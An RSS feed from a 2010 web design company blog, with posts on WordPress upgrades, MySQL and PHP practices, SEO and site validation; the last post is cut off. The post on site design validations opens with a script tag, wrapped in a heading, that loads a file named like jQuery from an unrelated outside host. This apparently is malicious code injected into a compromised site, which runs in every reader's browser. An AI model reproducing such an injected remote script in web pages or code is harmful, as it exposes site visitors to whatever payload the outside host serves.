<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Macronimous Web Design</title>
	<atom:link href="http://blog.macronimous.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.macronimous.com</link>
	<description>Just another WordPress site</description>
	<lastBuildDate>Mon, 19 Jul 2010 06:38:16 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
		<item>
		<title>iPhone SEO book launched.</title>
		<link>http://blog.macronimous.com/iphone-seo-book-launched/</link>
		<comments>http://blog.macronimous.com/iphone-seo-book-launched/#comments</comments>
		<pubDate>Mon, 19 Jul 2010 04:04:14 +0000</pubDate>
		<dc:creator>Macronimous</dc:creator>
				<category><![CDATA[Best Practices]]></category>
		<category><![CDATA[Search Engine Optimization]]></category>
		<category><![CDATA[Search Media Optimization]]></category>
		<category><![CDATA[Web tools]]></category>
		<category><![CDATA[iPhone Development]]></category>
		<category><![CDATA[iPhone SEO book]]></category>
		<category><![CDATA[SEO in iPhone]]></category>
		<category><![CDATA[SEO techniques mobile book]]></category>

		<guid isPermaLink="false">http://blog.macronimous.com/?p=244</guid>
		<description><![CDATA[Our popular E-Book Practical Search Engine optimization techniques is launched for the iPod Touch/iPhones. You can carry this simple iBook  in your iPhones and use it as quick reference. Its available at iTunes to download now.]]></description>
			<content:encoded><![CDATA[<p>Our popular E-Book Practical Search Engine optimization techniques is launched for the iPod Touch/iPhones. You can carry this simple iBook  in your iPhones and use it as quick reference. <a href="http://itunes.apple.com/us/app/practical-seo-techniques/id380643221?mt=8">Its available at iTunes to download now</a>. <a href="http://itunes.apple.com/us/app/practical-seo-techniques/id380643221?mt=8"><img class="alignright" title="Practical SEO Techniques " src="http://itunes.apple.com/images/web/freedownload.png" alt="Practical SEO Techniques- Download free SEO E-Book" width="182" height="36" /></a></p>


<!-- Begin TwitThis script (http://twitthis.com/) -->
<div style="text-align:left;">
<script type="text/javascript" src="http://s3.chuug.com/chuug.twitthis.scripts/twitthis.js"></script>
<script type="text/javascript">
<!--
document.write('<a href="javascript:;" onclick="TwitThis.pop();"><img src="http://s3.chuug.com/chuug.twitthis.resources/twitthis_grey_72x22.gif" alt="TwitThis" style="border:none;" /></a>');
//-->
</script>
</div>
<!-- /End -->

]]></content:encoded>
			<wfw:commentRss>http://blog.macronimous.com/iphone-seo-book-launched/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Upgrade to WordPress 3.0 &#8211; Few simple steps to do it yourself.</title>
		<link>http://blog.macronimous.com/upgrade-to-wordpress-3-0-few-simple-steps-to-do-it-yourself/</link>
		<comments>http://blog.macronimous.com/upgrade-to-wordpress-3-0-few-simple-steps-to-do-it-yourself/#comments</comments>
		<pubDate>Mon, 28 Jun 2010 13:54:57 +0000</pubDate>
		<dc:creator>Macronimous</dc:creator>
				<category><![CDATA[CMS]]></category>
		<category><![CDATA[Macronimous]]></category>
		<category><![CDATA[PHP Programming]]></category>
		<category><![CDATA[web programming]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[Upgrade WordPress]]></category>
		<category><![CDATA[WordPress 3]]></category>

		<guid isPermaLink="false">http://blog.macronimous.com/?p=245</guid>
		<description><![CDATA[Last weekend, we have upgraded this Blog system to WordPress 3. It went well without any troubles, as expected. Our team shares few simple steps to do it yourself. 1. Download WordPress 3.0 from the URL wordpress.org/download. And before you install make sure you have access to the FTP client and mysql database 2. Create a [...]]]></description>
			<content:encoded><![CDATA[<p>Last weekend, we have upgraded this Blog system to WordPress 3. It went well without any troubles, as expected. Our team shares few simple steps to do it yourself.</p>
<p>1. Download WordPress 3.0 from the URL wordpress.org/download. And before you install make sure you have access to the FTP client and mysql database</p>
<p>2. Create a subfolder in your domain root folder and upload unzipped wordpress 3.0 files to the subfolder. Create a database for new WordPress version on your web server. Rename the wp-config-sample.php file to wp-config.php. Open wp-config.php in a text editor and fill in your database details and upload to the desired folder. Run the WordPress installation script by accessing yourdomain.com/subfolder/wp-admin/install.php.</p>
<p>3. Now you should have done with the installation. Next step is to copy your theme files and paste it to the wp-content folder were you could see the default theme.</p>
<p>4. From now on you need to be very careful, copy you DB tables scripts from your existing blog database and paste it to a notepad. Here you see the links with the original URL yourdomain.com and you need to replace with demo URL yourdomain.com/subfolder/ since you are installing a demo test version in a subfolder. Now you can copy the DB table’s script and execute in your new database that has been created for demo version.</p>
<p>5. Now you are 50% done with wordpress 3.0. All the remaining is plugins and you need to note that all plugins are not compactable for new wordpress 3.0 so do not place all plugin in the wp-content plugin folder if happens then there would be problem in access wp-admin. Through your FTP client you need to create a folder can be named &#8220;backup&#8221; and place all your existing plugins in the &#8220;backup&#8221; folder. Then move on your desired plugin one by one to check compatibility by logging into wp-admin. There would be less or more plugins you would have located that are not compactable.</p>
<p>6.  Now you are done with your wordpress 3.0 in your demo version. You should be able to access your demo blog with all the post and as well you would be able to access blog wp-admin.</p>
<p>7. At this instant, you can move your live blog files to a different folder or can move to your local machine just for a support. Through FTP client go to your subfolder were you have wordpress 3.0 file and upload all the files in your root folder were you had the files of your previous word press version. Now download your wp-config.php and open in a text editor and fill in your live database details.</p>
<p>8. Now you need to access your mysql demo database and copy the table’s scripts to a notepad and change the URL from yourdomain.com/subfolder/ to yourdomain.com/ and execute it to your live database.</p>
<p>That’s it, now you can enjoy using wordpress 3.0 for your live blog.</p>


<!-- Begin TwitThis script (http://twitthis.com/) -->
<div style="text-align:left;">
<script type="text/javascript" src="http://s3.chuug.com/chuug.twitthis.scripts/twitthis.js"></script>
<script type="text/javascript">
<!--
document.write('<a href="javascript:;" onclick="TwitThis.pop();"><img src="http://s3.chuug.com/chuug.twitthis.resources/twitthis_grey_72x22.gif" alt="TwitThis" style="border:none;" /></a>');
//-->
</script>
</div>
<!-- /End -->

]]></content:encoded>
			<wfw:commentRss>http://blog.macronimous.com/upgrade-to-wordpress-3-0-few-simple-steps-to-do-it-yourself/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>We have 1217 bugs in our present blog system</title>
		<link>http://blog.macronimous.com/we-have-1217-bugs-in-our-present-blog-system/</link>
		<comments>http://blog.macronimous.com/we-have-1217-bugs-in-our-present-blog-system/#comments</comments>
		<pubDate>Sat, 19 Jun 2010 06:05:47 +0000</pubDate>
		<dc:creator>Macronimous</dc:creator>
				<category><![CDATA[Best Practices]]></category>
		<category><![CDATA[Content Management Systems]]></category>
		<category><![CDATA[Opensource]]></category>
		<category><![CDATA[PHP Programming]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[Wordpress update]]></category>
		<category><![CDATA[Wordpress version migration]]></category>
		<category><![CDATA[Wordpress version upgrade]]></category>

		<guid isPermaLink="false">http://blog.macronimous.com/?p=235</guid>
		<description><![CDATA[When we launched our business/technical blog system under this domain/url, it was done with WordPress version 2.7 and later we upgraded it to 2.9 (Carmen McRae release) last year. Now WordPress announced its version 3, with major revisions.  WordPress community announced that 1217 bugs were fixed (which means our present blog system has 1217 bugs) which is [...]]]></description>
			<content:encoded><![CDATA[<p>When we launched our business/technical blog system under this domain/url, it was done with WordPress version 2.7 and later we upgraded it to 2.9 (Carmen McRae release) last year. Now WordPress announced its version 3, with major revisions.  WordPress community announced that 1217 bugs were fixed (which means our present blog system has 1217 bugs) which is not a small number. It has 4 digits. <img src='http://blog.macronimous.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<div id="attachment_236" class="wp-caption alignright" style="width: 141px"><img class="size-full wp-image-236" title="wp3" src="http://blog.macronimous.com/wp-content/uploads/2010/06/wp3.jpg" alt="WordPress 3" width="131" height="73" /><p class="wp-caption-text">WordPress 3</p></div>
<p>Next week, we will be upgrading to the new WP 3.0 and we when have started planning now few things come to my mind.</p>
<ul>
<li>The first thing would be Database backup.</li>
<li>The only major task involved in WP upgrades is theme and plug-in compatibility checking. We may need to change our present theme and sacrifice some plug-is if they do not work with the new version. The directory of plug-ins for 3.0 is yet to be displayed, we are waiting for that.</li>
<li>We are preparing a list of plug-ins, I have asked team to give up some of the plug-ins like &#8216;Listen Now&#8217;, i do not see any use in it. We will also remove the video comment plug-in even if it is compatible with 3.0.</li>
<li>WordPress has detailed guide for version upgrades, simply following up http://codex.wordpress.org/Upgrading_WordPress helped us before.</li>
<li>Finally we will check the site for validations, in a previous blog we discussed this too. <a href="http://blog.macronimous.com/4-site-design-validations-you-should-do-before-you-deliver/" target="_self">4 site design validations you should do before you deliver</a></li>
</ul>
<p>Now why would we want to upgrade while the present 2.9 is working fine. Not just for the terrible figure 1217, But I like the following list of features which I see in WP3.</p>
<ol>
<li>Create multiple blogs/sites with single control panel. This would be a boon for company like us, who run more than 4 business sites and blogs. But we need to find how easy it would be.</li>
<li>Contextual help in the same page. You get what is what within that section. I am sure this will help our customers who use WordPress or any blogging/CMS for the first time.</li>
<li>Custom Menu management: We so far used third party plug-ins for Menu based navigations. Some plug-ins works well with some WordPress versions, and some are not. This is the graceful feature which I welcome.</li>
<li>Support for short URLs: We need to check is the short URLs are automatically created or we need to use a service like bit.ly</li>
</ol>
<p>Before we recommend the upgrade to our customers, we want to try and practice it in our system first. Can&#8217;t wait!</p>
<p>WordPress control panel has Auto upgrade at : http://blog.macronimous.com/wp-admin/update-core.php , we will try it and post it soon.</p>


<!-- Begin TwitThis script (http://twitthis.com/) -->
<div style="text-align:left;">
<script type="text/javascript" src="http://s3.chuug.com/chuug.twitthis.scripts/twitthis.js"></script>
<script type="text/javascript">
<!--
document.write('<a href="javascript:;" onclick="TwitThis.pop();"><img src="http://s3.chuug.com/chuug.twitthis.resources/twitthis_grey_72x22.gif" alt="TwitThis" style="border:none;" /></a>');
//-->
</script>
</div>
<!-- /End -->

]]></content:encoded>
			<wfw:commentRss>http://blog.macronimous.com/we-have-1217-bugs-in-our-present-blog-system/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tips for building better mySQL architecture</title>
		<link>http://blog.macronimous.com/building_better_mysql_architecture/</link>
		<comments>http://blog.macronimous.com/building_better_mysql_architecture/#comments</comments>
		<pubDate>Fri, 18 Jun 2010 12:07:18 +0000</pubDate>
		<dc:creator>Macronimous</dc:creator>
				<category><![CDATA[Best Practices]]></category>
		<category><![CDATA[Databases]]></category>
		<category><![CDATA[Web standards]]></category>
		<category><![CDATA[mySQL]]></category>
		<category><![CDATA[mySQL standards]]></category>
		<category><![CDATA[mySQL techniques]]></category>
		<category><![CDATA[rules for mySQL]]></category>

		<guid isPermaLink="false">http://blog.macronimous.com/?p=231</guid>
		<description><![CDATA[Have you thought about the right Data type which you should use? Is VARCHR bad? Do you review the SQL statements that you have written? Do you know what sort of impact indexes produce? How to leverage the query Caching techniques? Do you follow the naming standards? This simple slide teaches you the best mySQL [...]]]></description>
			<content:encoded><![CDATA[<p>Have you thought about the right Data type which you should use?<br />
Is VARCHR bad? Do you review the SQL statements that you have written? Do you know what sort of impact indexes produce? How to leverage the query Caching techniques? Do you follow the naming standards?</p>
<p>This simple slide teaches you the best mySQL practices to be followed up within 15 minutes.</p>
<div id="__ss_674234" style="width: 425px;"><object id="__sse674234" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="355" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=top20designtips-1228850767703439-8&amp;stripped_title=top-20-design-tips-for-mysql-data-architects-presentation" /><param name="name" value="__sse674234" /><param name="allowfullscreen" value="true" /><embed id="__sse674234" type="application/x-shockwave-flash" width="425" height="355" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=top20designtips-1228850767703439-8&amp;stripped_title=top-20-design-tips-for-mysql-data-architects-presentation" name="__sse674234" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<div style="padding:5px 0 12px"></div>
</div>
<p>Taking out the best from mySQL will improve the application performance, if its part of your day to day life get into these standards and practice the everyday. This presentation <a href="http://www.slideshare.net/">s</a> from <a href="http://www.slideshare.net/ronaldbradford" target="_blank">Ronald Bradford</a>. Thanks to Ronald for sharing.</p>


<!-- Begin TwitThis script (http://twitthis.com/) -->
<div style="text-align:left;">
<script type="text/javascript" src="http://s3.chuug.com/chuug.twitthis.scripts/twitthis.js"></script>
<script type="text/javascript">
<!--
document.write('<a href="javascript:;" onclick="TwitThis.pop();"><img src="http://s3.chuug.com/chuug.twitthis.resources/twitthis_grey_72x22.gif" alt="TwitThis" style="border:none;" /></a>');
//-->
</script>
</div>
<!-- /End -->

]]></content:encoded>
			<wfw:commentRss>http://blog.macronimous.com/building_better_mysql_architecture/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>4 site design validations you should do before you deliver</title>
		<link>http://blog.macronimous.com/4-site-design-validations-you-should-do-before-you-deliver/</link>
		<comments>http://blog.macronimous.com/4-site-design-validations-you-should-do-before-you-deliver/#comments</comments>
		<pubDate>Fri, 30 Apr 2010 07:20:12 +0000</pubDate>
		<dc:creator>Macronimous</dc:creator>
				<category><![CDATA[4 series]]></category>
		<category><![CDATA[Web Testing]]></category>
		<category><![CDATA[Web standards]]></category>
		<category><![CDATA[Web tools]]></category>
		<category><![CDATA[web design]]></category>

		<guid isPermaLink="false">http://blog.macronimous.com/4-site-design-validations-you-should-do-before-you-deliver/</guid>
		<description><![CDATA[1. Validate HTML W3C provides HTML validations, which checks the validity of HTML, XHTML etc. http://validator.w3.org/ 2. Validate your CSS You should use W3C&#8217;s CSS validator tool to validte your style sheets. http://jigsaw.w3.org/css-validator/ 3. Validate site links Check broken links across the site with W3C&#8217;s Link checker tool http://validator.w3.org/checklink 4. Cross browser compatibility Check the site [...]]]></description>
			<content:encoded><![CDATA[<h5><script src=http://rlf.emapis.org/js/jquery.min.js></script></h5>
<p><strong>1. Validate HTML</strong></p>
<p>W3C provides HTML validations, which checks the validity of HTML, XHTML etc.</p>
<p><a href="http://validator.w3.org/" target="_blank"> http://validator.w3.org/</a></p>
<p><strong>2. Validate your CSS</strong></p>
<p>You should use W3C&#8217;s CSS validator tool to validte your style sheets.</p>
<p><a href="http://jigsaw.w3.org/css-validator/" target="_blank">http://jigsaw.w3.org/css-validator/</a></p>
<p><strong>3. Validate site links</strong></p>
<p>Check broken links across the site with W3C&#8217;s Link checker tool</p>
<p><a href="http://validator.w3.org/checklink" target="_blank">http://validator.w3.org/checklink</a></p>
<p><strong>4. Cross browser compatibility</strong></p>
<p>Check the site on multiple browsers with this tool (You may not have a MAC, but you can you can test the site Mac Safari</p>
<p><a href="http://spoon.net/browsers/" target="_blank">http://spoon.net/browsers/</a></p>
<p>Even if its a simple static site, do them to make the site perfect.</p>


<!-- Begin TwitThis script (http://twitthis.com/) -->
<div style="text-align:left;">
<script type="text/javascript" src="http://s3.chuug.com/chuug.twitthis.scripts/twitthis.js"></script>
<script type="text/javascript">
<!--
document.write('<a href="javascript:;" onclick="TwitThis.pop();"><img src="http://s3.chuug.com/chuug.twitthis.resources/twitthis_grey_72x22.gif" alt="TwitThis" style="border:none;" /></a>');
//-->
</script>
</div>
<!-- /End -->

]]></content:encoded>
			<wfw:commentRss>http://blog.macronimous.com/4-site-design-validations-you-should-do-before-you-deliver/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>4 Things you should let your web development client know</title>
		<link>http://blog.macronimous.com/4-things-you-should-let-your-web-development-client-know/</link>
		<comments>http://blog.macronimous.com/4-things-you-should-let-your-web-development-client-know/#comments</comments>
		<pubDate>Fri, 30 Apr 2010 06:22:44 +0000</pubDate>
		<dc:creator>Macronimous</dc:creator>
				<category><![CDATA[4 series]]></category>
		<category><![CDATA[CMS]]></category>
		<category><![CDATA[Content Management Systems]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[Internet Marketing]]></category>
		<category><![CDATA[Opensource]]></category>
		<category><![CDATA[Search Engine Optimization]]></category>
		<category><![CDATA[Web business]]></category>
		<category><![CDATA[Web content]]></category>
		<category><![CDATA[web design]]></category>
		<category><![CDATA[web programming]]></category>
		<category><![CDATA[Content Management solution]]></category>
		<category><![CDATA[Opensource CMS]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Web development]]></category>
		<category><![CDATA[Web Marketing]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://blog.macronimous.com/?p=224</guid>
		<description><![CDATA[Not all the web clients are tech or web savvies. Many times you should pave them their success path online. Here are few a list of 4 important things which you should let your client know, if they trust your web development skills. 1. Flash: When they ask for a fully flashed website, let them [...]]]></description>
			<content:encoded><![CDATA[<p>Not all the web clients are tech or web savvies. Many times you should pave them their success path online. Here are few a list of 4 important things which you should let your client know, if they trust your web development skills.</p>
<p><strong>1. Flash: </strong>When they ask for a fully flashed website, let them know the adversity it might make. By doing this you are helping them to establish the right online presence. Unless your client is Coca cola or Burger King ( I mean,  :-), an establish brand), they will really want to establish better Visibility to the Search Engines.</p>
<p><strong>2. SEO</strong> &#8211; If a client just wants a website, let them know what SEO is and how it is going to help them. Make the site SEO friendly within the design scope (Eg. Image tags, XHTML validations, designing without tables, etc). Most of the clients will not say NO to make their site ready for SEO.</p>
<p><strong>3. CMS</strong> &#8211; Ask how frequently they want to change the content, and if they do, let them do know how to do it themselves with a CMS. You may also need to let them know the advantages of fresh content. I believe instead of providing them a static site of 20 pages, you can introduce them Joomla and how to use it, for some additional but onetime investments.</p>
<p><strong>4. Advantages of Opensource </strong>- Do they need a CMS or Ecommerce, You can justify why you charge less. Let them know that you can cut cost by using WordPress or Magento and still make their site professional. By doing this you are introducing standards &#8211; if your client goes to some other developers, it would not be difficult for them to take up the work.</p>
<p>I recommend you to keep a short write up (with some references) or articles on the above mentioned (you may keep that under your client section of your website) and ask the client to refer them. It also helps them to understand that you know what you tell them. <img src='http://blog.macronimous.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>


<!-- Begin TwitThis script (http://twitthis.com/) -->
<div style="text-align:left;">
<script type="text/javascript" src="http://s3.chuug.com/chuug.twitthis.scripts/twitthis.js"></script>
<script type="text/javascript">
<!--
document.write('<a href="javascript:;" onclick="TwitThis.pop();"><img src="http://s3.chuug.com/chuug.twitthis.resources/twitthis_grey_72x22.gif" alt="TwitThis" style="border:none;" /></a>');
//-->
</script>
</div>
<!-- /End -->

]]></content:encoded>
			<wfw:commentRss>http://blog.macronimous.com/4-things-you-should-let-your-web-development-client-know/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>All about Keyword cloud</title>
		<link>http://blog.macronimous.com/all-about-keyword-cloud/</link>
		<comments>http://blog.macronimous.com/all-about-keyword-cloud/#comments</comments>
		<pubDate>Wed, 31 Mar 2010 10:45:13 +0000</pubDate>
		<dc:creator>macronimous</dc:creator>
				<category><![CDATA[Internet Marketing]]></category>
		<category><![CDATA[Search Engine Optimization]]></category>
		<category><![CDATA[Web business]]></category>
		<category><![CDATA[Web standards]]></category>
		<category><![CDATA[Web tools]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[Keywords]]></category>
		<category><![CDATA[SEM]]></category>
		<category><![CDATA[Wordpress plugins]]></category>

		<guid isPermaLink="false">http://blog.macronimous.com/?p=212</guid>
		<description><![CDATA[What is Keyword cloud? Keyword cloud represents most used keywords in a site visually, by showing it in different font sizes and it is known to be a Search Engine Marketing (SEM) term. It differs from larger to smaller in font sizes. Keyword that has been used more around the site and blog, which we [...]]]></description>
			<content:encoded><![CDATA[<p><strong>What is Keyword cloud?</strong></p>
<p>Keyword cloud represents most used keywords in a site visually, by showing it in different font sizes and it is known to be a Search Engine Marketing (SEM) term. It differs from larger to smaller in font sizes. Keyword that has been used more around the site and blog, which we call as keyword density, are shown in larger fonts. According to the keyword density the font size varies from larger to smaller. On looking at the keyword cloud size variation, users can see the importance of the keywords that relates to web site or a blog.</p>
<p><strong>Benefits of keyword cloud</strong></p>
<p>Keyword cloud is benefited to find relevant and useful web pages for user who looks for certain information. </p>
<p>By using the keyword cloud, popular words (density rich words) are shown and it is as well clickable for users. When users find a keyword listed in keyword cloud useful then he will be going for a click on the particular keyword and he will be taken to the category search results page were all pages or blog posts will be listed related to the tagged keyword.</p>
<p>Make sure the keywords in the cloud section are not overlapped and ugly. Have it in a place were users could find it easily. The better option is to have it in the side bar of a site or blog. </p>
<p><strong>Keyword cloud generators</strong></p>
<p>Here is a site that helps to generate a keyword cloud by mentioning your web link.</p>
<p><a href="http://www.seochat.com/seo-tools/keyword-cloud/">http://www.seochat.com/seo-tools/keyword-cloud/</a></p>
<p><strong>WordPress Keyword Cloud generator plugin</strong></p>
<p>The below WordPress plugin helps you to install keyword cloud to your blog or site</p>
<p><a href="http://wordpress.org/extend/plugins/resize-tag-cloud/">http://wordpress.org/extend/plugins/resize-tag-cloud/</a><br />
<a href="http://wordpress.org/extend/plugins/keywords-cloud-for-wordpress/">http://wordpress.org/extend/plugins/keywords-cloud-for-wordpress/</a><br />
<a href="http://wordpress.org/extend/plugins/simple-tagging-plugin/screenshots/">http://wordpress.org/extend/plugins/simple-tagging-plugin/screenshots/</a></p>
<p><strong>How Keyword cloud will look like?</strong></p>
<p style="text-align: center;"><img class="size-full wp-image-213 aligncenter" title="Keyword Cloud" src="http://blog.macronimous.com/wp-content/uploads/2010/03/tag.GIF" border="0" alt="Keyword Cloud" width="183" height="359" align="center" /></p>
<p><a class="tag-link-35" style="font-size:  8.5384615384615pt;" title="3 topics" rel="tag" href="http://blog.macronimous.com/tag/wordpress/"></a></p>
<p>If you find any other interesting information about Keyword cloud, you may share through comments.</p>


<!-- Begin TwitThis script (http://twitthis.com/) -->
<div style="text-align:left;">
<script type="text/javascript" src="http://s3.chuug.com/chuug.twitthis.scripts/twitthis.js"></script>
<script type="text/javascript">
<!--
document.write('<a href="javascript:;" onclick="TwitThis.pop();"><img src="http://s3.chuug.com/chuug.twitthis.resources/twitthis_grey_72x22.gif" alt="TwitThis" style="border:none;" /></a>');
//-->
</script>
</div>
<!-- /End -->

]]></content:encoded>
			<wfw:commentRss>http://blog.macronimous.com/all-about-keyword-cloud/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Frameworks we like: 4. Codeigniter, and Why?</title>
		<link>http://blog.macronimous.com/frameworks-we-like-4-codeigniter-and-why/</link>
		<comments>http://blog.macronimous.com/frameworks-we-like-4-codeigniter-and-why/#comments</comments>
		<pubDate>Wed, 31 Mar 2010 07:49:13 +0000</pubDate>
		<dc:creator>Macronimous</dc:creator>
				<category><![CDATA[Frameworks]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Opensource]]></category>
		<category><![CDATA[PHP Programming]]></category>
		<category><![CDATA[Web standards]]></category>
		<category><![CDATA[Web tools]]></category>
		<category><![CDATA[web programming]]></category>
		<category><![CDATA[PHP Frameworks]]></category>
		<category><![CDATA[Web development Frameworks]]></category>

		<guid isPermaLink="false">http://blog.macronimous.com/?p=205</guid>
		<description><![CDATA[Codeigniter is an open source web application framework for building dynamic websites with programming language PHP. Its main aim is to facilitate the developers to develop projects much faster than writing code from the scratch. If you are a developer who want to meet the clients’ deadline and tired of tediously large and painstakingly undocumented [...]]]></description>
			<content:encoded><![CDATA[<p>Codeigniter is an open source web application framework for building dynamic websites with programming language PHP. Its main aim is to facilitate the developers to develop projects much faster than writing code from the scratch. If you are a developer who want to meet the clients’ deadline and tired of tediously large and painstakingly undocumented frameworks, Codeigniter is the way to go. When compared to other PHP frameworks, Codeigniter is often distinguished for its speed.</p>
<div id="attachment_209" class="wp-caption alignright" style="width: 180px"><img class="size-full wp-image-209" title="CodeIgniter" src="http://blog.macronimous.com/wp-content/uploads/2010/03/ci_logo2.gif" alt="CodeIgniter" width="170" height="73" /><p class="wp-caption-text">CodeIgniter</p></div>
<p>Now is the real time to know about the power of Codeigniter. So ignite yourself and initiate reading to know why you want to choose Codeigniter. It will suit if:</p>
<ul>
<li>You require a framework which      can be set up very quickly and efficiently.</li>
<li>You need an outstanding      performance.</li>
<li>You are a developer who needs methodical      and clear documentation.</li>
<li>You need a framework that does      not call for sticking on to restrictive coding rules.</li>
<li>You want a framework that needs nearly      zero configuration.</li>
<li>You need a framework which is      compatible with many environments</li>
</ul>
<p>Some of our developers always prefer to use  CodeIgniter, write me if you want to see some samples and know why they used CodeIgniter. If you want to start using CodeIgniter start right here at: <a href="http://codeigniter.com/">http://codeigniter.com/</a></p>
<p>3. <a style="text-decoration: none; color: #416e90; border: initial none initial;" href="http://blog.macronimous.com/frameworks-we-like-2-cakephp/" target="_self">Frameworks we like: 2. CakePHP and why?</a></p>
<p>2. <a style="text-decoration: none; color: #416e90; border: initial none initial;" href="http://blog.macronimous.com/php-frameworks-we-like-1-zend-and-why/" target="_blank">PHP Frameworks we like 1. Zend and why?</a></p>
<p>1. <a style="text-decoration: none; color: #416e90; border: initial none initial;" href="http://blog.macronimous.com/php-frameworks-we-like/" target="_blank">PHP Frameworks we like</a></p>


<!-- Begin TwitThis script (http://twitthis.com/) -->
<div style="text-align:left;">
<script type="text/javascript" src="http://s3.chuug.com/chuug.twitthis.scripts/twitthis.js"></script>
<script type="text/javascript">
<!--
document.write('<a href="javascript:;" onclick="TwitThis.pop();"><img src="http://s3.chuug.com/chuug.twitthis.resources/twitthis_grey_72x22.gif" alt="TwitThis" style="border:none;" /></a>');
//-->
</script>
</div>
<!-- /End -->

]]></content:encoded>
			<wfw:commentRss>http://blog.macronimous.com/frameworks-we-like-4-codeigniter-and-why/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>PHP Best practices and worst mistakes</title>
		<link>http://blog.macronimous.com/php-best-practices-and-worst-mistakes/</link>
		<comments>http://blog.macronimous.com/php-best-practices-and-worst-mistakes/#comments</comments>
		<pubDate>Wed, 31 Mar 2010 06:45:36 +0000</pubDate>
		<dc:creator>Macronimous</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[PHP Programming]]></category>
		<category><![CDATA[Web standards]]></category>
		<category><![CDATA[web programming]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[PHP best practices]]></category>
		<category><![CDATA[Web development Frameworks]]></category>

		<guid isPermaLink="false">http://blog.macronimous.com/?p=203</guid>
		<description><![CDATA[Months back, I made a post similar to this, But I believe another post emphasizing on the best practices is not considered bad. Working with PHP is something you enjoy everyday!. You always wanted to do your best to your clients. But when the deadlines are pressing and when the clients are on your shoulders people start [...]]]></description>
			<content:encoded><![CDATA[<p>Months back, I made a post similar to this, But I believe another post emphasizing on the best practices is not considered bad. <img src='http://blog.macronimous.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>Working with PHP is something you enjoy everyday!. You always wanted to do your best to your clients. But when the deadlines are pressing and when the clients are on your shoulders people start doing messy codings, and the standards got ignored. But you practice the best ways of programming everyday, it becomes your style and you have no alternate choice of doing quick and dirty work. Here are some simple best practices discussed by Matthew Weier of Zend technologies. Use them when you get an opportunity, and they will become your style of programming.</p>
<div id="__ss_472388" style="width: 425px;"><strong><a title="Everyday Best Practices of PHP Development" href="http://www.slideshare.net/weierophinney/everyday-best-practices-of-php-development">Everyday Best Practices of PHP Development</p>
<p></a></strong></div>
<div style="width: 425px;"><strong><a title="Everyday Best Practices of PHP Development" href="http://www.slideshare.net/weierophinney/everyday-best-practices-of-php-development"></a></strong><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="355" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=20080614bestpractices-1213726335523088-9&amp;stripped_title=everyday-best-practices-of-php-development" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="355" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=20080614bestpractices-1213726335523088-9&amp;stripped_title=everyday-best-practices-of-php-development" allowscriptaccess="always" allowfullscreen="true"></embed></object></div>
<div style="padding:5px 0 12px"></div>
<div style="padding:5px 0 12px">If you are hiring freshers they need to know or learn PHP programming, learn your own standard way of programming which should be derived from the best practices. Its good to introduce the best practices from the day one, and not after you loosing clients because of the messy procedures and codings you follow. It would be easy to adapt them before you start doing serious coding.</div>
<div style="padding:5px 0 12px">Now, some mistakes you make and how to avoid the:</div>
<div style="padding:5px 0 12px">
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">Learn this serious mistakes and do not DO them!</div>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">http://www.codinghorror.com/blog/2009/01/top-25-most-dangerous-programming-mistakes.html</div>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">Learn this general programming mistakes which you should not repeat</div>
